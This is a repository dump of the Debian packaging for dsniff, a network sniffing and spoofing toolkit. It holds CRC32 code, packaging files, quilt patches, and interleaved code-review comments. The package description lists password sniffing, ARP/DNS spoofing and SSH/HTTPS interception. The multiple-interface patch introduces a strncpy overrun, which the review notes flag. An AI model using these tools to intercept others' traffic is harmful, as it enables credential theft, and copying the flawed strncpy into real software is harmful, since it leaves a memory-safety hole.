| 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 44 | 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 45 | 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 46 | 0xf00f9344, 0x8708a3d2, 
0x1e01f268, 0x6906c2fe, 47 | 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 48 | 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 49 | 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 50 | 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 51 | 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 52 | 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 53 | 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 54 | 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 55 | 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 56 | 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 57 | 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 58 | 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 59 | 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 60 | 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 61 | 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 62 | 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 63 | 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 64 | 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 65 | 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 66 | 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 67 | 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 68 | 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 69 | 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 70 | 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 71 | 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 72 | 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 73 | 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d 74 | }; 75 | 76 | /* 77 | * Update a running CRC with the bytes 78 | * buf[0..len-1]--the CRC should be 79 | * initialized to all 1's. 80 | */ 81 | uint32_t 82 | crc32_update(const void *buf, size_t len, uint32_t crc) { 83 | const uint8_t *b = buf; 84 | size_t i; 85 | for (i = 0; i < len; i++) { 86 | crc = CRC32_Table[(crc ^ *b++) & 0xff] ^ (crc >> 8); 87 | } 88 | return ~crc; 89 | } 90 | 91 | /* 92 | * Return the CRC of the bytes buf[0..len-1]. 
93 | */ 94 | uint32_t 95 | crc32(const void *buf, size_t len) { 96 | return crc32_update(buf, len, CRC32_INITIAL); 97 | } 98 | -------------------------------------------------------------------------------- /crc32.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ifndef __DS_CRC32_H__ 4 | #define __DS_CRC32_H__ 1 5 | 6 | #define CRC32_INITIAL ((uint32_t)0xffffffff) 7 | #define CRC32_INITIAL_STATE (~CRC32_INITIAL) 8 | 9 | #include 10 | #include 11 | 12 | uint32_t crc32_update(const void *buf, size_t len, uint32_t crc); 13 | uint32_t crc32(const void *buf, size_t len); 14 | 15 | #endif /* __DS_CRC32_H__ */ 16 | -------------------------------------------------------------------------------- /debian/README.Debian: -------------------------------------------------------------------------------- 1 | dsniff for Debian 2 | ----------------- 3 | 4 | The latest upstream release of dsniff is from 2002. Notable changes made to 5 | the Debian version of dsniff include: 6 | * the -p option was added to support processing already captured traffic (pcap 7 | file) in addition to capturing directly from a network interface 8 | * the -c and -r options were added to arpspoof (see man page for details) 9 | * small improvements to protocol decoders have been made 10 | 11 | -- Lukas Schwaighofer , Wed, 03 May 2017 19:48:27 +0200 12 | -------------------------------------------------------------------------------- /debian/README.source: -------------------------------------------------------------------------------- 1 | This package uses quilt to manage all modifications to the upstream 2 | source. Changes are stored in the source package as diffs in 3 | debian/patches and applied during the build. 
4 | 5 | To configure quilt to use debian/patches instead of patches, you want 6 | either to export QUILT_PATCHES=debian/patches in your environment 7 | or use this snippet in your ~/.quiltrc: 8 | 9 | for where in ./ ../ ../../ ../../../ ../../../../ ../../../../../; do 10 | if [ -e ${where}debian/rules -a -d ${where}debian/patches ]; then 11 | export QUILT_PATCHES=debian/patches 12 | break 13 | fi 14 | done 15 | 16 | To get the fully patched source after unpacking the source package, cd to 17 | the root level of the source package and run: 18 | 19 | quilt push -a 20 | 21 | The last patch listed in debian/patches/series will become the current 22 | patch. 23 | 24 | To add a new set of changes, first run quilt push -a, and then run: 25 | 26 | quilt new 27 | 28 | where is a descriptive name for the patch, used as the filename in 29 | debian/patches. Then, for every file that will be modified by this patch, 30 | run: 31 | 32 | quilt add 33 | 34 | before editing those files. You must tell quilt with quilt add what files 35 | will be part of the patch before making changes or quilt will not work 36 | properly. After editing the files, run: 37 | 38 | quilt refresh 39 | 40 | to save the results as a patch. 41 | 42 | Alternately, if you already have an external patch and you just want to 43 | add it to the build system, run quilt push -a and then: 44 | 45 | quilt import -P /path/to/patch 46 | quilt push -a 47 | 48 | (add -p 0 to quilt import if needed). as above is the filename to 49 | use in debian/patches. The last quilt push -a will apply the patch to 50 | make sure it works properly. 51 | 52 | To remove an existing patch from the list of patches that will be applied, 53 | run: 54 | 55 | quilt delete 56 | 57 | You may need to run quilt pop -a to unapply patches first before running 58 | this command. 
59 |
--------------------------------------------------------------------------------
/debian/control:
--------------------------------------------------------------------------------
1 | Source: dsniff
2 | Section: net
3 | Priority: optional
4 | Maintainer: Debian Security Tools
5 | Uploaders: Marcos Fouces, Lukas Schwaighofer
6 | Standards-Version: 4.6.1
7 | Build-Depends: libdb-dev, libpcap0.8-dev, libnids-dev, libssl-dev, libxmu-dev, libnet1-dev, debhelper-compat (= 13)
8 | Homepage: https://www.monkey.org/~dugsong/dsniff/
9 | Vcs-Git: https://salsa.debian.org/pkg-security-team/dsniff.git
10 | Vcs-Browser: https://salsa.debian.org/pkg-security-team/dsniff
11 | Rules-Requires-Root: no
12 |
13 | Package: dsniff
14 | Architecture: any
15 | Depends: ${shlibs:Depends}, ${misc:Depends}, openssl
16 | Description: Various tools to sniff network traffic for cleartext insecurities
17 | This package contains several tools to listen to and create network traffic:
18 | .
19 | * arpspoof - Send out unrequested (and possibly forged) arp replies.
20 | * dnsspoof - forge replies to arbitrary DNS address / pointer queries
21 | on the Local Area Network.
22 | * dsniff - password sniffer for several protocols.
23 | * filesnarf - saves selected files sniffed from NFS traffic.
24 | * macof - flood the local network with random MAC addresses.
25 | * mailsnarf - sniffs mail on the LAN and stores it in mbox format.
26 | * msgsnarf - record selected messages from different Instant Messengers.
27 | * sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
28 | * sshow - SSH traffic analyser.
29 | * tcpkill - kills specified in-progress TCP connections.
30 | * tcpnice - slow down specified TCP connections via "active"
31 | traffic shaping.
32 | * urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
33 | * webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
34 | * webspy - sends URLs sniffed from a client to your local browser
35 | (requires libx11-6 installed).
36 | .
37 | Please do not abuse this software.
38 |
--------------------------------------------------------------------------------
/debian/copyright:
--------------------------------------------------------------------------------
1 | Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
2 | Upstream-Name: dsniff
3 | Source: https://www.monkey.org/~dugsong/dsniff/
4 | The CVS directory is useless for packaging.
5 | Files-Excluded: CVS/*
6 |
7 | Files: *
8 | Copyright: 1999-2000 Dug Song
9 | License: BSD-3-Clause
10 |
11 | Files: debian/*
12 | Copyright: 2016-2022 Marcos Fouces
13 | 2018 Samuel Henrique
14 | 2013 Andrew Shadura
15 | 2011-2012 William Vera
16 | 2011 Ondřej Surý
17 | 2006-2011 Luciano Bello
18 | 2005-2006 Faidon Liambotis
19 | 2003-2005 Steve Kemp
20 | 2002 Samuele Giovanni Tonon
21 | 2001 Peter Palfrader
22 | 2000-2001 Robert van der Meulen
23 | 2000 David M. Zendzian
24 | License: BSD-3-Clause
25 |
26 | License: BSD-3-Clause
27 | Redistribution and use in source and binary forms, with or without
28 | modification, are permitted provided that the following conditions
29 | are met:
30 | .
31 | 1. Redistributions of source code must retain the above copyright
32 | notice, this list of conditions and the following disclaimer.
33 | 2. Redistributions in binary form must reproduce the above copyright
34 | notice, this list of conditions and the following disclaimer in the
35 | documentation and/or other materials provided with the distribution.
36 | 3. The name of author may not be used to endorse or promote products
37 | derived from this software without specific prior written permission.
38 | .
39 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
40 | INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
41 | AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
42 | THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
43 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
44 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
45 | OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
46 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
47 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
48 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
49 |
--------------------------------------------------------------------------------
/debian/docs:
--------------------------------------------------------------------------------
1 | README
2 |
--------------------------------------------------------------------------------
/debian/gbp.conf:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | debian-branch = debian/master
3 | pristine-tar = True
4 |
5 | [buildpackage]
6 | sign-tags = True
7 |
8 | [import-orig]
9 | filter-pristine-tar = True
10 |
11 | [pq]
12 | patch-numbers = False
13 |
14 | [dch]
15 | multimaint-merge = True
16 |
-------------------------------------------------------------------------------- /debian/patches/01_time.h.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Include to fix segfault on some architectures. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315969 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/msgsnarf.c 8 | +++ b/msgsnarf.c 9 | @@ -23,6 +23,7 @@ 10 | #include 11 | #include 12 | #include 13 | +#include 14 | 15 | #include "buf.h" 16 | #include "decode.h" 17 | --- a/sshow.c 18 | +++ b/sshow.c 19 | 
@@ -15,6 +15,7 @@ 20 | 21 | #include 22 | #include 23 | +#include 24 | 25 | #include 26 | #include 27 | -------------------------------------------------------------------------------- /debian/patches/02_mailsnarf_corrupt.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: mailsnarf does not parse mail correctly. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=149330 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/mailsnarf.c 8 | +++ b/mailsnarf.c 9 | @@ -178,7 +178,7 @@ 10 | if (smtp->state != SMTP_DATA) { 11 | while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { 12 | line = buf_tok(&buf, NULL, i + 2); 13 | - line->base[line->end] = '\0'; 14 | + line->base[line->end-1] = '\0'; 15 | p = buf_ptr(line); 16 | 17 | if (strncasecmp(p, "RSET", 4) == 0) { 18 | -------------------------------------------------------------------------------- /debian/patches/04_multiple_intf.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Work with multiple interfaces. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=242369 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/arp.c 8 | +++ b/arp.c 9 | @@ -39,7 +39,7 @@ 10 | 11 | #ifdef BSD 12 | int 13 | -arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) 14 | +arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) 15 | { 16 | int mib[6]; 17 | size_t len; 18 | @@ -91,7 +91,7 @@ 19 | #endif 20 | 21 | int 22 | -arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) 23 | +arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) 24 | { 25 | int sock; 26 | struct arpreq ar; 27 | 
@@ -99,7 +99,7 @@ 28 | 29 | memset((char *)&ar, 0, sizeof(ar)); 30 | #ifdef __linux__ 31 | - strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev)); /* XXX - *sigh* */ 32 | + strncpy(ar.arp_dev, lif, strlen(lif)); 33 | #endif 34 | sin = (struct sockaddr_in *)&ar.arp_pa; 35 | sin->sin_family = AF_INET; 36 | --- a/arp.h 37 | +++ b/arp.h 38 | @@ -11,6 +11,6 @@ 39 | #ifndef _ARP_H_ 40 | #define _ARP_H_ 41 | 42 | -int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether); 43 | +int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); 44 | 45 | #endif /* _ARP_H_ */ 46 | --- a/arpspoof.c 47 | +++ b/arpspoof.c 48 | @@ -113,7 +113,7 @@ 49 | int i = 0; 50 | 51 | do { 52 | - if (arp_cache_lookup(ip, mac) == 0) 53 | + if (arp_cache_lookup(ip, mac, intf) == 0) 54 | return (1); 55 | #ifdef __linux__ 56 | /* XXX - force the kernel to arp. feh. */ 57 | -------------------------------------------------------------------------------- /debian/patches/06_urlsnarf_zeropad.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: urlsnarf: zero-pad date. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=298605 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -68,7 +68,7 @@ 10 | t->tm_hour - gmt.tm_hour); 11 | tz = hours * 60 + t->tm_min - gmt.tm_min; 12 | 13 | - len = strftime(tstr, sizeof(tstr), "%e/%b/%Y:%X", t); 14 | + len = strftime(tstr, sizeof(tstr), "%d/%b/%Y:%X", t); 15 | if (len < 0 || len > sizeof(tstr) - 5) 16 | return (NULL); 17 | 18 | -------------------------------------------------------------------------------- /debian/patches/08_openssl-0.9.8.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Fix FTBFS with openssl. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/ssh.c 7 | 
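Review bot: In 04_multiple_intf.patch, the arp.c hunk at @@ -99,7 +99,7 @@ bounds the copy by the source instead of the destination: `strncpy(ar.arp_dev, lif, strlen(lif));` copies as many bytes as the interface name has, so a name longer than ar.arp_dev overruns the field, where the removed line was limited by `sizeof(ar.arp_dev)`. Suggest `strncpy(ar.arp_dev, lif, sizeof(ar.arp_dev) - 1);`, which also preserves the terminator left by the memset above it. Minor: the new parameter is spelled `linf` in the BSD definition and in arp.h but `lif` in the second definition; one name would read better.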
+++ b/ssh.c 8 | @@ -16,6 +16,7 @@ 9 | #include 10 | #include 11 | #include 12 | +#include 13 | 14 | #include 15 | #include 16 | -------------------------------------------------------------------------------- /debian/patches/09_sysconf_clocks.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Fix FTBFS: ./sshow.c:226: error: 'CLK_TCK' undeclared. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/sshow.c 7 | +++ b/sshow.c 8 | @@ -217,6 +217,7 @@ 9 | { 10 | clock_t delay; 11 | int payload; 12 | + long CLK_TCK= sysconf(_SC_CLK_TCK); 13 | 14 | delay = add_history(session, 0, cipher_size, plain_range); 15 | 16 | @@ -265,6 +266,7 @@ 17 | clock_t delay; 18 | int skip; 19 | range string_range; 20 | + long CLK_TCK= sysconf(_SC_CLK_TCK); 21 | 22 | delay = add_history(session, 1, cipher_size, plain_range); 23 | 24 | -------------------------------------------------------------------------------- /debian/patches/10_urlsnarf_escape.patch: -------------------------------------------------------------------------------- 1 | Author: Hilko Bengen 2 | Description: Escape user, vhost, uri, referer, agent strings in log. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=372536 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | 
@@ -84,6 +84,43 @@ 10 | return (tstr); 11 | } 12 | 13 | +static char * 14 | +escape_log_entry(char *string) 15 | +{ 16 | + char *out; 17 | + unsigned char *c, *o; 18 | + size_t len; 19 | + 20 | + if (!string) 21 | + return NULL; 22 | + 23 | + /* Determine needed length */ 24 | + for (c = string, len = 0; *c; c++) { 25 | + if ((*c < 32) || (*c >= 128)) 26 | + len += 4; 27 | + else if ((*c == '"') || (*c =='\\')) 28 | + len += 2; 29 | + else 30 | + len++; 31 | + } 32 | + out = malloc(len+1); 33 | + if (!out) 34 | + return NULL; 35 | + for (c = string, o = out; *c; c++, o++) { 36 | + if ((*c < 32) || (*c >= 128)) { 37 | + snprintf(o, 5, "\\x%02x", *c); 38 | + o += 3; 39 | + } else if ((*c == '"') || ((*c =='\\'))) { 40 | + *(o++) = '\\'; 41 | + *o = *c; 42 | + } else { 43 | + *o = *c; 44 | + } 45 | + } 46 | + out[len]='\0'; 47 | + return out; 48 | +} 49 | + 50 | static int 51 | process_http_request(struct tuple4 *addr, u_char *data, int len) 52 | { 53 | 
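Review bot: In escape_log_entry() (10_urlsnarf_escape.patch, hunk @@ -84,6 +84,43 @@), the test `(*c < 32) || (*c >= 128)` lets 0x7f (DEL) through unescaped although it is a control character like the ones below 32; if the goal is that no raw control byte reaches the log, add `*c == 127` to the test in both the length pass and the copy pass. The two passes repeat the same classification by hand and must stay in step for `len` to match what is written, so a small helper that returns the escaped width of one byte would make that harder to break. Also, `c = string`, `o = out` and `snprintf(o, ...)` mix `char *` and `unsigned char *` without casts.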
@@ -142,18 +179,26 @@ 54 | buf_tok(NULL, NULL, i); 55 | } 56 | } 57 | - if (user == NULL) 58 | - user = "-"; 59 | - if (vhost == NULL) 60 | - vhost = libnet_addr2name4(addr->daddr, Opt_dns); 61 | - if (referer == NULL) 62 | - referer = "-"; 63 | - if (agent == NULL) 64 | - agent = "-"; 65 | - 66 | + user = escape_log_entry(user); 67 | + vhost = escape_log_entry(vhost); 68 | + uri = escape_log_entry(uri); 69 | + referer = escape_log_entry(referer); 70 | + agent = escape_log_entry(agent); 71 | + 72 | printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n", 73 | libnet_addr2name4(addr->saddr, Opt_dns), 74 | - user, timestamp(), req, vhost, uri, referer, agent); 75 | + (user?user:"-"), 76 | + timestamp(), req, 77 | + (vhost?vhost:libnet_addr2name4(addr->daddr, Opt_dns)), 78 | + uri, 79 | + (referer?referer:"-"), 80 | + (agent?agent:"-")); 81 | + 82 | + free(user); 83 | + free(vhost); 84 | + free(uri); 85 | + free(referer); 86 | + free(agent); 87 | } 88 | fflush(stdout); 89 | 90 | -------------------------------------------------------------------------------- /debian/patches/11_string_header.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: Avoid the "implicit declaration of function 'str*'" warning 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/arp.c 7 | +++ b/arp.c 8 | @@ -34,6 +34,7 @@ 9 | #include 10 | #include 11 | #include 12 | +#include 13 | 14 | #include "arp.h" 15 | 16 | --- a/buf.c 17 | +++ b/buf.c 18 | @@ -17,6 +17,7 @@ 19 | #include 20 | #include 21 | #include 22 | +#include 23 | 24 | #include "buf.h" 25 | 26 | --- a/decode_nntp.c 27 | +++ b/decode_nntp.c 28 | @@ -15,6 +15,7 @@ 29 | 30 | #include 31 | #include 32 | +#include 33 | 34 | #include "base64.h" 35 | #include "decode.h" 36 | --- a/decode_pop.c 37 | +++ b/decode_pop.c 38 | 
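Review bot: In the process_http_request() hunk of 10_urlsnarf_escape.patch (@@ -142,18 +179,26 @@), `uri` is the only escaped field handed to printf() without a fallback: user, vhost, referer and agent all go through a `x?x:...` expression, but escape_log_entry() returns NULL for a NULL input and when malloc fails, so `uri` can reach `%s` as NULL. Suggest `(uri?uri:"-")`, or skipping the log line when escaping fails.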
@@ -14,6 +14,7 @@ 39 | 40 | #include 41 | #include 42 | +#include 43 | 44 | #include "base64.h" 45 | #include "options.h" 46 | --- a/decode_rlogin.c 47 | +++ b/decode_rlogin.c 48 | @@ -14,6 +14,8 @@ 49 | 50 | #include 51 | #include 52 | +#include 53 | +#include 54 | 55 | #include "options.h" 56 | #include "decode.h" 57 | --- a/decode_smb.c 58 | +++ b/decode_smb.c 59 | @@ -15,6 +15,7 @@ 60 | 61 | #include 62 | #include 63 | +#include 64 | 65 | #include "decode.h" 66 | 67 | --- a/decode_smtp.c 68 | +++ b/decode_smtp.c 69 | @@ -14,6 +14,7 @@ 70 | 71 | #include 72 | #include 73 | +#include 74 | 75 | #include "base64.h" 76 | #include "options.h" 77 | --- a/decode_sniffer.c 78 | +++ b/decode_sniffer.c 79 | @@ -15,6 +15,8 @@ 80 | 81 | #include 82 | #include 83 | +#include 84 | +#include 85 | 86 | #include "base64.h" 87 | #include "decode.h" 88 | --- a/decode_socks.c 89 | +++ b/decode_socks.c 90 | @@ -14,6 +14,7 @@ 91 | 92 | #include 93 | #include 94 | +#include 95 | 96 | #include "decode.h" 97 | 98 | --- a/decode_tds.c 99 | +++ b/decode_tds.c 100 | @@ -18,6 +18,7 @@ 101 | 102 | #include 103 | #include 104 | +#include 105 | 106 | #include "decode.h" 107 | 108 | --- a/decode_telnet.c 109 | +++ b/decode_telnet.c 110 | @@ -14,6 +14,7 @@ 111 | 112 | #include 113 | #include 114 | +#include 115 | 116 | #include "options.h" 117 | #include "decode.h" 118 | --- a/decode_x11.c 119 | +++ b/decode_x11.c 120 | @@ -14,6 +14,8 @@ 121 | 122 | #include 123 | #include 124 | +#include 125 | +#include 126 | 127 | #include "decode.h" 128 | 129 | --- a/dnsspoof.c 130 | +++ b/dnsspoof.c 131 | @@ -20,6 +20,7 @@ 132 | #include 133 | #include 134 | #include 135 | +#include 136 | #include 137 | #include 138 | #include 139 | --- a/magic.c 140 | +++ b/magic.c 141 | @@ -36,6 +36,7 @@ 142 | #include 143 | #include 144 | #include 145 | +#include 146 | #include 147 | #include 148 | #include 149 | --- /dev/null 150 | +++ b/missing/strlcat.h 151 | 
@@ -0,0 +1 @@ 152 | +size_t strlcat(char *dst, const char *src, size_t siz); 153 | --- /dev/null 154 | +++ b/missing/strlcpy.h 155 | @@ -0,0 +1 @@ 156 | +size_t strlcpy(char *dst, const char *src, size_t siz); 157 | --- a/sshmitm.c 158 | +++ b/sshmitm.c 159 | @@ -24,6 +24,7 @@ 160 | #include 161 | #include 162 | #include 163 | +#include 164 | 165 | #include "buf.h" 166 | #include "record.h" 167 | -------------------------------------------------------------------------------- /debian/patches/12_arpa_inet_header.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: avoid the "implicit declaration of function 'ntohs'" warning 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/decode_aim.c 7 | +++ b/decode_aim.c 8 | @@ -14,6 +14,7 @@ 9 | 10 | #include 11 | #include 12 | +#include 13 | 14 | #include "hex.h" 15 | #include "buf.h" 16 | --- a/decode_mmxp.c 17 | +++ b/decode_mmxp.c 18 | @@ -21,6 +21,7 @@ 19 | 20 | #include 21 | #include 22 | +#include 23 | 24 | #include "buf.h" 25 | #include "decode.h" 26 | --- a/decode_pptp.c 27 | +++ b/decode_pptp.c 28 | @@ -16,6 +16,7 @@ 29 | 30 | #include 31 | #include 32 | +#include 33 | 34 | #include "buf.h" 35 | #include "decode.h" 36 | --- a/decode_tds.c 37 | +++ b/decode_tds.c 38 | @@ -19,6 +19,7 @@ 39 | #include 40 | #include 41 | #include 42 | +#include 43 | 44 | #include "decode.h" 45 | 46 | --- a/decode_vrrp.c 47 | +++ b/decode_vrrp.c 48 | @@ -15,6 +15,7 @@ 49 | 50 | #include 51 | #include 52 | +#include 53 | 54 | #include "buf.h" 55 | #include "decode.h" 56 | --- a/ssh.c 57 | +++ b/ssh.c 58 | 
@@ -23,6 +23,7 @@ 59 | #include 60 | #include 61 | #include 62 | +#include 63 | #include 64 | 65 | #include "hex.h" 66 | -------------------------------------------------------------------------------- /debian/patches/13_pop_with_version.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: distinguish between pop versions 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/decode.c 7 | +++ b/decode.c 8 | @@ -63,7 +63,8 @@ 9 | { "http", decode_http }, 10 | { "ospf", decode_ospf }, 11 | { "poppass", decode_poppass }, 12 | - { "pop", decode_pop }, 13 | + { "pop2", decode_pop }, 14 | + { "pop3", decode_pop }, 15 | { "nntp", decode_nntp }, 16 | { "smb", decode_smb }, 17 | { "imap", decode_imap }, 18 | --- a/dsniff.services 19 | +++ b/dsniff.services 20 | @@ -10,8 +10,8 @@ 21 | ospf 89/ip 22 | http 98/tcp 23 | poppass 106/tcp 24 | -pop 109/tcp 25 | -pop 110/tcp 26 | +pop2 109/tcp 27 | +pop3 110/tcp 28 | portmap 111/tcp 29 | portmap -111/tcp 30 | portmap 111/udp 31 | -------------------------------------------------------------------------------- /debian/patches/14_obsolete_time.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: According to /usr/include/time.h, CLK_TCK is the 3 | "obsolete POSIX.1-1988 name" for CLOCKS_PER_SEC. 4 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=420944 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/sshow.c 9 | +++ b/sshow.c 10 | @@ -224,7 +224,7 @@ 11 | if (debug) 12 | printf("- %s -> %s: DATA (%s bytes, %.2f seconds)\n", 13 | s_saddr(ts), s_daddr(ts), s_range(plain_range), 14 | - (float)delay / CLK_TCK); 15 | + (float)delay / CLOCKS_PER_SEC); 16 | if (debug > 1) 17 | print_data(&ts->server, cipher_size); 18 | 19 | 
@@ -273,7 +273,7 @@ 20 | if (debug) 21 | printf("- %s <- %s: DATA (%s bytes, %.2f seconds)\n", 22 | s_saddr(ts), s_daddr(ts), s_range(plain_range), 23 | - (float)delay / CLK_TCK); 24 | + (float)delay / CLOCKS_PER_SEC); 25 | if (debug > 1) 26 | print_data(&ts->client, cipher_size); 27 | 28 | @@ -302,7 +302,7 @@ 29 | 30 | if (session->state == 1 && 31 | #ifdef USE_TIMING 32 | - now - get_history(session, 2)->timestamp >= CLK_TCK && 33 | + now - get_history(session, 2)->timestamp >= CLOCKS_PER_SEC && 34 | #endif 35 | session->protocol == 1 && 36 | (session->history.directions & 7) == 5 && 37 | -------------------------------------------------------------------------------- /debian/patches/15_checksum_libnids.patch: -------------------------------------------------------------------------------- 1 | Author: Gleb Paharenko 2 | Description: Workaround to this Debian bug 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=420129 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/dsniff.c 8 | +++ b/dsniff.c 9 | 
@@ -70,6 +70,80 @@ 10 | { 11 | } 12 | 13 | + 14 | +static int get_all_ifaces(struct ifreq **, int *); 15 | +static unsigned int get_addr_from_ifreq(struct ifreq *); 16 | + 17 | +int all_local_ipaddrs_chksum_disable() 18 | +{ 19 | + struct ifreq *ifaces; 20 | + int ifaces_count; 21 | + int i, ind = 0; 22 | + struct nids_chksum_ctl *ctlp; 23 | + unsigned int tmp; 24 | + 25 | + if (!get_all_ifaces(&ifaces, &ifaces_count)) 26 | + return -1; 27 | + ctlp = 28 | + (struct nids_chksum_ctl *) malloc(ifaces_count * 29 | + sizeof(struct 30 | + nids_chksum_ctl)); 31 | + if (!ctlp) 32 | + return -1; 33 | + for (i = 0; i < ifaces_count; i++) { 34 | + tmp = get_addr_from_ifreq(ifaces + i); 35 | + if (tmp) { 36 | + ctlp[ind].netaddr = tmp; 37 | + ctlp[ind].mask = inet_addr("255.255.255.255"); 38 | + ctlp[ind].action = NIDS_DONT_CHKSUM; 39 | + ind++; 40 | + } 41 | + } 42 | + free(ifaces); 43 | + nids_register_chksum_ctl(ctlp, ind); 44 | +} 45 | + 46 | +/* helper functions for Example 2 */ 47 | +unsigned int get_addr_from_ifreq(struct ifreq *iface) 48 | +{ 49 | + if (iface->ifr_addr.sa_family == AF_INET) 50 | + return ((struct sockaddr_in *) &(iface->ifr_addr))-> 51 | + sin_addr.s_addr; 52 | + return 0; 53 | +} 54 | + 55 | +static int get_all_ifaces(struct ifreq **ifaces, int *count) 56 | +{ 57 | + int ifaces_size = 8 * sizeof(struct ifreq); 58 | + struct ifconf param; 59 | + int sock; 60 | + unsigned int i; 61 | + 62 | + *ifaces = 